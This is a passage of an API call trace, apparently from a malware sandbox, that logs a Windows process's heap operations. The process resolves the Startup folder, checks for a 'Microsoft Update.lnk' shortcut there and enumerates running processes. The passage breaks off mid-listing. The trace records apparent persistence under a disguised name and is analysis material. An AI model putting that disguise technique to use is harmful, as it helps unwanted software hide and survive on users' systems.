dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0288.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0288.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0288.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0288.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0288.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0288.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0288.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0288.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0288.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0288.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0288.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0288.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0288.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0288.353] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0288.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0288.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0288.354] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0288.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0288.355] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0288.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0288.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0288.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0288.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0288.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0288.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0288.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0288.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0288.357] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0288.358] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0288.358] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0288.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0288.360] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.367] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0288.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.379] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0288.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0288.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0288.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0288.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0288.387] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0288.388] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0288.389] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, 